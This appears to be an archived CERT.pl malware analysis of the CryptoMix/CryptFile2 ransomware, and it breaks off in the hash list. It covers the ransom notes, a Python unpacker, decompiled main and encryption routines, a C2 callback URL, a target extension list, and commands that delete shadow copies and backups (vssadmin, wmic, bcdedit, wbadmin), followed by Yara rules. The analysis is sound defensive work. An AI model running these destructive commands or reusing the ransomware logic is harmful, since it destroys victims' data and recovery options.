{
	"id": "d24dc257-8c07-4376-98cb-8465baf04ea6",
	"created_at": "2026-04-06T00:21:00.656655Z",
	"updated_at": "2026-04-10T03:21:38.221177Z",
	"deleted_at": null,
	"sha1_hash": "af7d428f50137b7a36a4975678dfe98bc20a9bfd",
	"title": "Technical analysis of CryptoMix/CryptFile2 ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1446163,
	"plain_text": "Technical analysis of CryptoMix/CryptFile2 ransomware\r\nArchived: 2026-04-05 12:48:12 UTC\r\nCampaign\r\nCryptoMix is another ransomware family that is trying to earn money by encrypting victims files\r\nand coercing them into paying the ransom.\r\nUntil recently it was more known as CryptFile2, but for reasons unknown to us it was rebranded and\r\nnow it’s called CryptoMix.\r\nIt was observed in the wild being served by the Rig-V exploit kit.\r\nThis malware stands out from among others, but not necessarily in a good way.\r\nPrice\r\nFirst unusual thing about this family is very large amount of money requested – 5 bitcoins is an\r\ninsane amount of money (especially considering that CryptoMix is really primitive under the hood,\r\nbut we’ll get to it). We don’t know how many victims have paid, but probably few were desperate\r\nenough.\r\nAdditionally we have stumbled upon following comment discouraging anyone from paying the\r\nransom:\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 1 of 17\n\nDO NOT PAY FOR THIS!!!\r\nwe were infected and they asked for 10 bitcoins, after some negotiations the price was\r\nlowered to 6 bitcoins. they provided 1 decrypted file to prove concept. we paid 6 bitcoins\r\nand they asked for another .6 as the c\u0026c server will not provide the key due to late\r\npayment. after promptly paying another .6 bitcoins (about $4800 in total) there has been\r\nno communication from them! its been 2 weeks and nothing.\r\nWHATEVER YOU DO, DO NOT TRUST THEM, THEY WILL NOT DECRYPT\r\nYOUR FILES!!!!\r\nWe can’t verify if this is true, but it sounds plausible – if someone is desperate enough to pay 6\r\nbitcoins for his files, he probably can be coerced into paying even more. As usual, we discourage\r\nanyone from supporting the criminals by paying the ransom.\r\nPayment portal\r\nAdditionally CryptoMix doesn’t have any payment portal in the Tor network. Or any payment\r\nportal, for that matter – victim have to write an email and literally wait some time before malware\r\noperators kindly send the decryption keys\r\n(assuming that they will do it, instead of bargaining for even more money).\r\nFor example, ransom message can look like this (most recent variant):\r\n_---CryptoMix---_\r\nNOT YOUR LANGUAGE? USE https://translate.google.com\r\nWhat happened to your files ?\r\nAll of your files protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here:\r\nhttps://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to\r\nyour computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt\r\nprogram , which is on our Secret Server\r\nWhat do I do ?\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 2 of 17\n\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or\r\nstart send email now for more specific instructions! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other\r\nway to get your files, except make a payment.\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further\r\ninstructions. Our specialist will contact you within 24 hours.\r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file\r\nand we will send you back it in a decrypted form. This will be your guarantee.\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will\r\ndouble your price!\r\nSo right now You have a chance to buy your individual private SoftWare with a low price!\r\nE-MAIL1: enc10@dr.com\r\nE-MAIL2: enc10@usa.com\r\nOr like this (older variant):\r\nNOT YOUR LANGUAGE? USE https://translate.google.com\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here:\r\nhttp://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to\r\nyour computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt\r\nprogram , which is on our Secret Server\r\nWhat do I do ?\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 3 of 17\n\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or\r\nstart obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other\r\nway to get your files, except make a payment.\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further\r\ninstructions. Our specialist will contact you within 12 hours.\r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file\r\nand we will send you back it in a decrypted form. This will be your guarantee.\r\nE-MAIL1: xoomx@dr.com\r\nE-MAIL2: xoomx@usa.com\r\nWe don’t think that this strategy was well thought out. First of all, using emails for communication\r\nwith victims is bothersome and need constant attention.\r\nAutomated portal would be much more reliable and secure for both sides. Additionally, emails are\r\nprone to being deleted/locked, effectively cutting malware authors from their “clients”.\r\nCharity\r\nContent of exchanged emails is very unusual too. Actors claim to be a charity organization (!) that is\r\ngoing to sponsor presents and medical help for children. For example:\r\nDear User,\r\nto decrypt your files You will need a special software with your special unique private key.\r\nPrice of software and your private key is 5 bitcoins. With this product you can decrypt all\r\nyour files and protect Your system!!! Protect!!! Your system will be without any\r\nvulnerability.\r\nAlso You will have a FREE tech support for solving any PC troubles for 3 years!\r\nYou can buy bitcoins through this bitcoin web site https://localbitcoins.com/\r\nRegister there and find a nearest Bitcoin seller. It`s easy! Choose more comfortable payment\r\nmethod for buying Bitcoin!\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 4 of 17\n\nAfter that You should send 5 bitcoins to the bitcoin wallet address:\r\n[cut]\r\nAll this process is very easy! It`s like a simple money transfer.\r\nAnd now most important information:\r\nYour money will be spent for the children charity. So that is mean that You will get a\r\nparticipation in this process too. Many children will receive presents and medical help!\r\nAnd We trust that you are kind and honest person! Thank You very much! We wish You all\r\nthe best! Your name will be in the main donors list and will stay in the charity history!\r\nP.S\u003e When your payment will be delivered you will receive your software with private key\r\nIMMEDIATELY!\r\nP.P.S\u003e In the next 24 hours your price will be doubled by the Main Server automatically. So\r\nnow you have a chance to restore your PC with low price!\r\nBest regards,\r\nCharity Team\r\nThat’s really original, but unfortunately also obviously false.\r\nLeaving aside strange quirks of ransomware “interface”, let’s get more technical. In its heart,\r\nCryptoMix is just a bare bones encryptor – it doesn’t have any fancy features, it doesn’t have a web\r\nportal, it doesn’t change user wallpaper, the only thing it does is encrypting every file on the\r\nvictim’s disk and on the mounted network drives.\r\nCryptoMix is protected by a very primitive packer – the real binary is stored in resources, and xored\r\nwith a hardcoded key. For some reason, Cuckoo has problems with automatic unpacking of\r\ncryptomixer, so we had to write our own unpacker. Using pefile and Yara is very easy:\r\ndef try_decrypt_with(m, xorkey):\r\nfor res in m.pe.DIRECTORY_ENTRY_RESOURCE.entries:\r\nif res.name is not None or True:\r\nres0 = res.directory.entries[0].directory.entries[0].data.struct\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 5 of 17\n\nd = m.read(res0.OffsetToData, res0.Size)\r\ndecrypted = xor(d, xorkey)\r\nif decrypted[:2] != \"MZ\":\r\ncontinue\r\nif decrypted[:16] != '4d5a90000300000004000000ffff0000'.decode('hex'):\r\nprint \"invalid decryption key/length\", len(xorkey)\r\ncontinue\r\nreturn decrypted\r\ndef process_yara_hit(m, hit, *args):\r\nxoraddr = m.dword(hit+2)\r\nxorkey = m.read(xoraddr, 13)\r\nreturn try_decrypt_with(m, xorkey)\r\nAfter decryption ransomware checks whether it’s being debugged – but no antiVM techniques are\r\nemployed, so everything works as it should under VirtualBox.\r\nBefore file encryption starts, the ransomware checks internet connectivity (using InternetOpenUrl\r\nfunction). If everything is ok, an encryption key is generated on victim’s PC and sent to the C\u0026C\r\nserver.\r\nOtherwise, depending on malware version, either a hardcoded encryption key is used or malware is\r\nspinning in an infinite loop until the internet connection is restored.\r\nThe main function can be expressed as follows:\r\nif ( !encryptionDone() ) // don't run on already encrypted system\r\n{\r\nif ( !cryptomixInitialized() ) // don't run if already encrypting\r\n{\r\ninitialize1(); // create registry keys, mutexes\r\ninitialize2(); // etc\r\n}\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 6 of 17\n\n// check internet connectivity (url is different for each version)\r\ninternetIsOk =\r\ninternetOpenUrlA(\"http://217.23.7.105/ms_chek_os/ms_statistic_os_key.php?\r\ninfo=SCmvxag30Y35DIy7JTzxsJSTLJzUe67VbrPhiiCr4iIe\") == 1;\r\nif ( !getExistingRsaKey() ) // check if key was already selected\r\n{\r\nif ( internetIsOk == 1 )\r\ngenerateRsaKeyToRegistry(); // online mode - generate RSA key\r\nelse\r\nsaveKeyToRegistry((int)\u0026staticRsaKey, 268); // offline mode - use hardcoded key\r\nif ( internetIsOk == 1 )\r\nlogEncryptionStatus(1); // upload generated key and OS info to C\u0026C server\r\n}\r\nkeyData = globalAlloc(64, 268);\r\ngetKeyFromRegistry(\u0026keyData);\r\nif ( keyData[0] || keyData[1]) )\r\nsaveKeyToRegistry(keyData, 268);\r\nelse\r\nkeyData = (int)\u0026staticRsaKey;\r\nGetWindowsDirectoryW(\u0026windowsDir, 260);\r\nfor (int i = 0; i \u003c 26; i++)\r\n{\r\ndrive = (char)('A' + i);\r\nwsprintf(\u0026v36, L\"%c:\", drive);\r\ndriveType = getDriveType(\u0026v36);\r\nif ( driveType == DRIVE_REMOVEABLE || driveType == DRIVE_FIXED || driveType ==\r\nDRIVE_REMOTE )\r\n{\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 7 of 17\n\nif ( strstrw(\u0026windowsDir, \u0026v36) ) // check windows directory\r\n{\r\nrecursiveEncryptDrive(\u0026v36, \u0026off_2D406C, keyData, 8);\r\n}\r\nelse\r\n{\r\nrecursiveEncryptDrive(\u0026v36, \u0026off_2D406C, keyData, 3);\r\nsub_2D3BD3(\u0026v36);\r\n}\r\n}\r\n}\r\nif ( internetIsOk == 1 )\r\nlogEncryptionStatus(0);\r\nsetRegStatus(\"LesliDone\"); // save status to registry\r\n}\r\nAfter encryption key is generated/selected, it is stored in windows registry. Registry key used for\r\nmalware specific data varies depending on version, but for example\r\nSoftWare\\Microsoft\\Windows\\Shell\\Nodes Slots,\r\nSoftWare\\Microsoft\\Windows\\Shell\\FlashPlayerPluginK or Software\\Adobe Reader\r\nLicensionSoftWare\\AdobeLicensionSoftWare can be used (malware probably tries to hide its\r\npresence by impersonating another software).\r\nThe list of supported extensions constains more than 1250 entries:\r\n.3g2 .3gp .7z .ab4 .ach .adb .ads .ait .al .apj .asf .asm .asp .asx .back .bank\r\n.bgt .bik .bkf .bkp .bpw .c .cdf .cdr .cdx .ce1 .ce2 .odf .odg .odp .ods .oil\r\n.one .oth .otp .ots .p12 .p7b .p7c .pas .pat .pbo .pcd .pct .pem .php .pip .pl\r\n.plc .pot .potm .potx .ppam .pps .ppsm .ppsx .prf .psafe3 .pspimage .pub .puz\r\n.py .qba .qbw .r3d .raf .rar .rat .raw .rm .rwz .sas7bdat .say .sd0 .sda .snp\r\n.srf .srt .st4 .st5 .st6 .st7 .st8 .stc .std .sti .stx .sxc .sxi .sxm .vob .vsx\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 8 of 17\n\n.vtx .wav .wb2 .wll .wmv .wpd .x11 .xla .xlam .xlb .xlc .xll .xlm .xlr .xlsb\r\n.xlt .xltm .xltx .m4a .wma .d3dbsp .xlw .xpp .xsn .yuv .zip .sie .unrec .scan\r\n.sum .t13 .t12 .qdf .tax .pkpass .bc6 .bc7 .sidn .sidd .mddata .itl .icxs .hvpl\r\n.hplg .hkdb .mdbackup .syncdb .gho .cas .wmo .itm .sb .fos .mov .vdf .ztmp .sis\r\n.sid .ncf .menu .layout .dmp .blob .esm .vcf .vtf .dazip .fpk .mlx .kf .iwd\r\n.vpk .tor .psk .rim .w3x .fsh .ntl .arch00 .lvl .snx .cfr .ff .vpp_pc .lrf .m2\r\n.mcmeta .vfs0 .mpqge .db0 .dba .rofl .hkx .bar .upk .das .litemod .asset .forge\r\n.bsa .apk .re4 .lbf .slm .epk .rgss3a .pak .big .wallet .wotreplay .xxx .desc\r\n.m3u .js .rb .1cd .dbf .dt .cf .cfu .mxl .epf .kdbx .vrp .grs .geo .st .pff\r\n.mft .efd .3dm .3ds .rib .ma .sldasm .sldprt .max .blend .lwo .lws .m3d .mb\r\n.obj .x .x3d .movie .byu .c4d .fbx .dgn .dwg .4db .4dl .4mp .abs .accdb .accdc\r\n.accde .accdr .accdt .accdw .accft .adn .a3d .adp .aft .ahd .alf .ask .awdb\r\n.azz .bdb .bnd .bok .thumb .tjp .tm2 .tn .tpi .ufo .uga .usertile-ms .vda .vff\r\n.vpe .vst .wb1 .wbc .wbd .wbm .wbmp .wbz .wdp .webp .wpb .wpe .wvl .x3f .y .ysp\r\n.zif .cdr4 .cdr6 .cdrw .jpeg .djvu .pdf .ddoc .css .pptm .raw .cpt .jpg .jpe\r\n.jp2 .pcx .pdn .png .psd .tga .tiff .tif .hdp .xpm .ai .ps .wmf .emf .ani .apng\r\n.flc .fb2 .fb3 .fli .mng .smil .svg .mobi .swf .html .xls .xlsx .xlsm .xhtm\r\n.mrwref .xf .pst .bd .tar .gz .mkv .xml .xmlx .dat .mcl .mte .cfg .mp3 .btr\r\n.bak .backup .cdb .ckp .clkw .cma .daconnections .dacpac .dad .dadiagrams .daf\r\n.daschema .db .db-shm .db-wal .db2 .db3 .dbc .dbk .dbs .dbt .dbv .dbx .dcb .dct\r\n.dcx .ddl .df1 .dmo .dnc .dp1 .dqy .dsk .dsn .dta .dtsx .dxl .eco .ecx .edb\r\n.emd .eql .fcd .fdb .fic .fid .fm5 .fmp .fmp12 .fmpsl .fol .fp3 .fp4 .fp5 .fp7\r\n.fpt .fzb .fzv .gdb .gwi .hdb .his .ib .idc .ihx .itdb .itw .jtx .kdb .lgc .maq\r\n.mdb .mdbhtml .mdf .mdn .mdt .mrg .mud .mwb .s3m .myd .ndf .ns2 .ns3 .ns4 .nsf\r\n.nv2 .nyf .oce .odb .oqy .ora .orx .owc .owg .oyx .p96 .p97 .pan .pdb .pdm .phm\r\n.pnz .pth .pwa .qpx .qry .qvd .rctd .rdb .rpd .cer .cfp .class .cls .cmt .cpi\r\n.cpp .craw .crt .crw .cs .csh .csl .csv .dac .dbr .ddd .der .des .dgc .dng .drf\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 9 of 17\n\n.k2p .dtd .dxg .ebd .eml .exf .ffd .fff .fh .fhd .fla .flac .flv .fm .gray\r\n.grey .grw .gry .h .hpp .ibd .iif .indd .java .key .laccdb .lua .m .m4v .maf\r\n.mam .mar .maw .mdc .mde .mfw .mmw .mp4 .mpg .mpp .mrw .mso .ndd .nef .nk2 .nsd\r\n.nsg .nsh .nwb .nx1 .nx2 .odc .rsd .sbf .sdb .sdf .spq .sqb .stp .sql .sqlite\r\n.sqlite3 .sqlitedb .str .tcx .tdt .te .teacher .trm .udb .usr .v12 .vdb .vpd\r\n.wdb .wmdb .xdb .xld .xlgc .zdb .zdc .cdr3 .ppt .pptx .1st .abw .act .aim .ans\r\n.apt .asc .ascii .ase .aty .awp .awt .aww .bad .bbs .bdp .bdr .bean .bib .bna\r\n.boc .btd .bzabw .chart .chord .cnm .crd .crwl .cyi .dca .dgs .diz .dne .doc\r\n.docm .docx .docxml .docz .dot .dotm .dotx .dsv .dvi .dx .eio .eit .email .emlx\r\n.epp .err .etf .etx .euc .fadein .faq .fbl .fcf .fdf .fdr .fds .fdt .fdx .fdxt\r\n.fes .fft .flr .fodt .fountain .gtp .frt .fwdn .fxc .gdoc .gio .gpn .gthr .gv\r\n.hbk .hht .hs .htc .hwp .hz .idx .iil .ipf .jarvis .jis .joe .jp1 .jrtf .kes\r\n.klg .knt .kon .kwd .latex .lbt .lis .lit .lnt .lp2 .lrc .lst .ltr .ltx .lue\r\n.luf .lwp .lxfml .lyt .lyx .man .map .mbox .md5txt .me .mell .min .mnt .msg\r\n.mwp .nfo .njx .notes .now .nwctxt .nzb .ocr .odm .odo .odt .ofl .oft .openbsd\r\n.ort .ott .p7s .pages .pfs .pfx .pjt .plantuml .prt .psw .pu .pvj .pvm .pwi\r\n.pwr .qdl .rad .readme .rft .ris .rng .rpt .rst .rt .rtd .rtf .rtx .run .rzk\r\n.rzn .saf .safetext .sam .scc .scm .scriv .scrivx .scw .sdm .sdoc .sdw .sgm\r\n.sig .skcard .sla .slagz .sls .smf .sms .ssa .strings .stw .sty .sub .sxg .sxw\r\n.tab .tdf .text .thp .tlb .tm .tmd .tmv .tmx .tpc .trelby .tvj .txt .u3d .u3i\r\n.unauth .unx .uof .uot .upd .utf8 .unity .utxt .vct .vnt .vw .wbk .wcf .webdoc\r\n.wgz .wn .wp .wp4 .wp5 .wp6 .wp7 .wpa .wpl .wps .wpt .wpw .wri .wsc .dxf .egc\r\n.ep .eps .epsf .fh10 .fh11 .fh3 .fh4 .fh5 .fh6 .fh7 .fh8 .fif .fig .fmv .ft10\r\n.ft11 .ft7 .ft8 .ft9 .ftn .fxg .gdraw .gem .glox .gsd .hpg .hpgl .hpl .idea\r\n.igt .igx .imd .ink .lmk .mgcb .mgmf .mgmt .mt9 .mgmx .mgtx .mmat .mat .otg\r\n.ovp .ovr .pcs .pfd .pfv .pl .plt .vrml .pobj .psid .rdl .scv .sk1 .sk2 .slddrt\r\n.snagitstamps .snagstyles .ssk .stn .svf .svgz .sxd .tlc .tne .ufr .vbr .vec\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 10 of 17\n\n.vml .vsd .vsdm .vsdx .vstm .stm .vstx .wpg .vsm .vault .xar .xmind .xmmap .yal\r\n.orf .ota .oti .ozb .ozj .ozt .pal .pano .pap .pbm .pc1 .pc2 .pc3 .pcd .pdd\r\n.pe4 .pef .pfi .pgf .pgm .pi1 .pi2 .pi3 .pic .pict .pix .pjpeg .pjpg .pm .pmg\r\n.pni .pnm .pntg .pop .pp4 .pp5 .ppm .prw .psdx .pse .psp .pspbrush .ptg .ptx\r\n.pvr .px .pxr .pz3 .pza .pzp .pzs .z3d .qmg .ras .rcu .rgb .rgf .ric .riff .rix\r\n.rle .rli .rpf .rri .rs .rsb .rsr .rw2 .rwl .s2mv .sai .sci .sct .sep .sfc\r\n.sfera .sfw .skm .sld .sob .spa .spe .sph .spj .spp .sr2 .srw .ste .sumo .sva\r\n.save .ssfn .t2b .tb0 .tbn .tex .tfc .tg4 .thm .qbi .qbr .cnt .v30 .qbo .lgb\r\n.qwc .qbp .aif .qby .1pa .qpd .set .nd .rtp .qbwin .log .qbbackup .tmp\r\n.temp1234 .qbt .qbsdk .syncmanagerlogger .ecml .qsm .qss .qst .fx0 .fx1 .mx0\r\n.fpx .fxr .fim .better_call_saul .breaking bad .heisenberg .ytbl .wsd .wsh .wtx\r\n.xbdoc .xbplate .xdl .xlf .xps .xwp .xy3 .xyp .xyw .ybk .yml .zabw .zw .2bp .0\r\n.36 .3fr .411 .73i .8xi .9png .abm .afx .agif .agp .aic .albm .apd .apm .aps\r\n.apx .artwork .arw .asw .avatar .bay .blkrt .bm2 .bmp .bmx .bmz .brk .brn .brt\r\n.bss .bti .c4 .cal .cals .can .cd5 .cdc .cdg .cimg .cin .cit .colz .cpc .cpd\r\n.cpg .cps .cpx .cr2 .ct .dc2 .dcr .dds .dgt .dib .djv .dm3 .dmi .vue .dpx .wire\r\n.drz .dt2 .dtw .dvl .ecw .eip .erf .exr .fal .fax .fil .fpos .g3 .gcdp .gfb\r\n.gfie .ggr .gif .gih .gim .gmbck .gmspr .spr .scad .gpd .gro .grob .hdr .hpi\r\n.i3d .icn .icpr .iiq .info .int .ipx .itc2 .iwi .j .j2c .j2k .jas .jb2 .jbig\r\n.jbig2 .jbmp .jbr .jfif .jia .jng .jpg2 .jps .jpx .jtf .jwl .jxr .kdc .kdi .kdk\r\n.kic .kpg .lbm .ljp .mac .mbm .mef .mnr .mos .mpf .mpo .mrxs .myl .ncr .nct\r\n.nlm .nrw .oc3 .oc4 .oc5 .oci .omf .oplc .af2 .af3 .ai .art .asy .cdmm .cdmt\r\n.cdmtz .cdmz .cdt .cgm .cmx .cnv .csy .cv5 .cvg .cvi .cvs .cvx .cwt .cxf .dcs\r\n.ded .design .dhs .dpp .drw .dxb .locky .micro .zepto .cerber3 .cerber .axx\r\n.ecc .crypt .ezz .r5a .ccc .exx .crypz .cerber2 .cerber4 .cerber5 .odin\r\n.cryptowall .enciphered .cryptolocker .cryp1 .locked .crypted .lol! .encrypted\r\n.xxx .lechiffre .aesir .rrk .enigma .zzzzz .coverton .encrypt .good .wflx .ttt\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 11 of 17\n\n.zcrypt .aaa .access_denied .dharma .xtbl .crysis .vvv\r\nThat’s quite a lot of extensions, but nothing special (for comparsion: CryptXXX supports 933\r\nextensions, CrypMIC 901). Most unusual thing here is inclusion of another ransomware extensions\r\n(for example .zepto, .locky, .crypt, .locked, .cryptolocker, .cryptowall, etc).\r\nEncryption\r\nLet’s get back to ransom message for a while:\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to\r\nyour computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt\r\nprogram , which is on our Secret Server\r\nMalware claims that our files are “encrypted with 2048bit RSA KEY”. Well, it’s not entirely true.\r\nYes, 2048bit RSA key is generated with windows Crypto API – but after RSA key is selected, it is\r\nhashed with SHA256 to create a real encryption key and every file on disk is encrypted with that\r\nkey. Encryption algorithm used is AES 256 in CBC mode without initialization vector.\r\nEncryption routine can be summarized with this (simplified) code:\r\nrealEncrypt(void *rsaKey, _DWORD *sourceData, int dataSize, _DWORD *resultPointer)\r\nhHash = 0;\r\nif ( CryptAcquireContextW(\u0026hProvider, 0, 0, 24, 0xF0000000) )\r\n{\r\nif ( CryptCreateHash(hProvider, 32780, 0, 0, \u0026hHash) )\r\n{\r\nif ( CryptHashData(hHash, rsaKey, 0x10Cu, 0) \u0026\u0026 CryptDeriveKey(hProvider,\r\nCALG_AES_256, hHash, 1, \u0026hKey) )\r\n{\r\nif ( CryptEncrypt(hKey, 0, 1, 0, 0, \u0026dataSize, dataSize) )\r\n{\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 12 of 17\n\nresult = GlobalAlloc(0x40u, dataSize);\r\nif ( result )\r\n{\r\nrtlMoveMemory(result, *sourceData, dataSize);\r\nCryptEncrypt(result, 0, 1, 0, result, \u0026dataSize, dataSize)\r\n}\r\n}\r\n}\r\n}\r\n}\r\nThis function is called for every file, so hashing rsaKey and deriving AES key every time doesn’t\r\nmake much sense. But there is bigger problem with it – there is no need for such things as “public”\r\nand “private” keys, because this encryption routine is entirely symmetric – RSA serves here just as\r\n(unnecesarily slow) random number generator.\r\nSo yes, in a way RSA is “used for encryption”, but files are not encrypted with RSA and encryption\r\nis entirely symmetric.\r\nUserID given by CryptoMix is not random – it is generated from username and serial number for\r\nfirst disk.\r\nunsigned int getUpperUserIDDword()\r\n{\r\nif ( getVolumeInfo(\"C:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n{\r\nif ( getVolumeInfo(\"D:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n{\r\nif ( getVolumeInfo(\"E:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n{\r\nif ( getVolumeInfo(\"F:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n{\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 13 of 17\n\nif ( getVolumeInfo(\"G:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n{\r\nif ( getVolumeInfo(\"H:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n{\r\nif ( getVolumeInfo(\"Z:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n{\r\nif ( getVolumeInfo(\"X:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0) \u003c= 0 )\r\n{\r\ngetVolumeInfo(\"Y:\\\\\", 0, 0, \u0026result, 0, 0, 0, 0);\r\n}\r\n}\r\n}\r\n}\r\n}\r\n}\r\n}\r\n}\r\nreturn result;\r\n}\r\nint getLowerUserIDDword()\r\n{\r\nv6 = 261;\r\nif ( getUserName(\u0026v4, \u0026v6) )\r\n{\r\nlowKeySource = \u0026v4;\r\n}\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 14 of 17\n\nelse\r\n{\r\nv7 = 16;\r\nif ( !getComputerName(\u0026v5, \u0026v7) )\r\nreturn getLowKey();\r\nlowKeySource = \u0026v5;\r\n}\r\nreturn trivialHashFunction(lowKeySource);\r\n}\r\nThis doesn’t seem like a good idea, because UserIDs absolutely have to be unique, and neither\r\nusername nor volume serial number is designed to be unique – so userID collisions are possible and\r\nvery plausible (after taking low entropy of userID and birthday paradox into account).\r\nWhy is this a problem? Because when UserID collision happens, malware creators have no way of\r\ndistinguishing two users apart – so they don’t know which encryption key belongs to which user,\r\nand can’t send the right one. It’s also possible that in case of collision old key will be overwritten in\r\ndatabase and lost.\r\nFinally, CryptoMix achieves persistence by copying itself to user documents and writing to\r\nHKEY_CURRENT_USER\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Run registry key.\r\nAs a final measure, all shadow copies are removed (if user doesn’t have admin account, UAC\r\nwindow is shown before):\r\nShellExecuteW(0, 0, L\"cmd\", L\"/C \\tvssadmin.exe Delete Shadows /All /Quiet\", 0, 0);\r\nShellExecuteW1(v5, 0, 0, L\"cmd\", L\"/C \\twmic shadowcopy delete\", 0, 0);\r\nRtlZeroMemory(\u0026v20, 3);\r\nRtlZeroMemory1(\u0026v21, 10);\r\nfor (int i = 0; i \u003c 26; i++)\r\n{\r\nwsprintf(\u0026v22, L\"/C vssadmin Delete Shadows /For=%c: /All /Quiet \", 90 - i);\r\nShellExecuteW2(0, 0, L\"cmd\", \u0026v22, 0, 0);\r\n}\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 15 of 17\n\nShellExecuteW3(v11, 0, 0, L\"cmd\", L\"/C net stop vss\", 0, 0);\r\nShellExecuteW4(v13, 0, 0, L\"cmd\", L\"/C bcdedit /set {default} recoveryenabled No\", 0, 0);\r\nShellExecuteW5(v15, 0, 0, L\"cmd\", L\"/C bcdedit /set {default} bootstatuspolicy\r\nignoreallfailures\", 0, 0);\r\nreturn ShellExecuteW6(v17, 0, 0, L\"cmd\", L\"/C wbadmin delete catalog -quiet\", 0, 0);\r\nCryptomix Decryptor\r\nDue to a cryptographic flaw in encryption, we are able to decrypt CryptoMix (and CryptFile2), but\r\nonly sometimes and only if files were encrypted with a vulnerable version.\r\nIf your files were encrypted by CryptoMix and you don’t want to pay a ransom, you can contact us\r\nat cert@cert.pl and we’ll see what we can do.\r\nPlease attach a single encrypted file without changing it’s filename after encryption (for example\r\nwarnings.h.email[supl0@post.com]id[7e5973f5e0ce337d].lesli).\r\nHashes/patterns\r\nCryptomix packer (old and new):\r\nrule cryptomix_packer\r\n{\r\nmeta:\r\nauthor = \"msm\"\r\nstrings:\r\n$old_real_main = {8B [5] 8B [5] 03 ?? 89 ?? FC FF 55 FC}\r\n$old_crypto_ops = {83 ?? 1F 83 ?? 60}\r\n$old_crypto_xor = {8A 90 [4] 30 14 0E} // extract xor key from this\r\n$new_crypto_ops = {03 85 [4] 88 10 EB ??}\r\n$new_crypto_xor = {A1 [4] 89 45 ??} // extract xor key from this\r\ncondition:\r\n2 of them\r\n}\r\nhttps://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/\r\nPage 16 of 17\n\nCryptomix payload (after unpacking):\r\nrule cryptomix_payload\r\n{\r\nmeta:\r\nauthor = \"msm\"\r\nstrings:\r\n$get_static_rsa = { 56 68 [4] E8 [4] 59 59 }\r\n$get_final_message = { B9 ?? ?? 00 00 BE [4] 8D BD [4] [0-10] F3 A5}\r\n$get_email_format = { FF 75 ?? 68 [4] 50 FF 55 [1] }\r\n$get_rsa_reg_key = { 6A 00 68 [4] 68 01 00 00 80 FF D0 68 [4] }\r\n$get_extension = { 68 3C 72 40 00 8D 4C ?? ?? 51 FF D0 }\r\n$get_extensions_to_encrypt = { FF 74 24 [1] 68 [4] E8 [4] }\r\n$get_extensions_to_encrypt_new = { 68 [4] BE [4] 56 FF D0 85 C0 }\r\n$get_cnc_url = { 68 [4] E8 [4] 48 F7 D8 1B C0 40 }\r\ncondition:\r\n3 of ($get_*)\r\n}\r\nhashes:\r\nc2f30cd537c79b6bcd292e6824ea874e sample0\r\nbefc0e43b38fe467ddc3ddd73150a9fc sample0 decrypted\r\n8c413e31f39a54abf78c3585444051f7 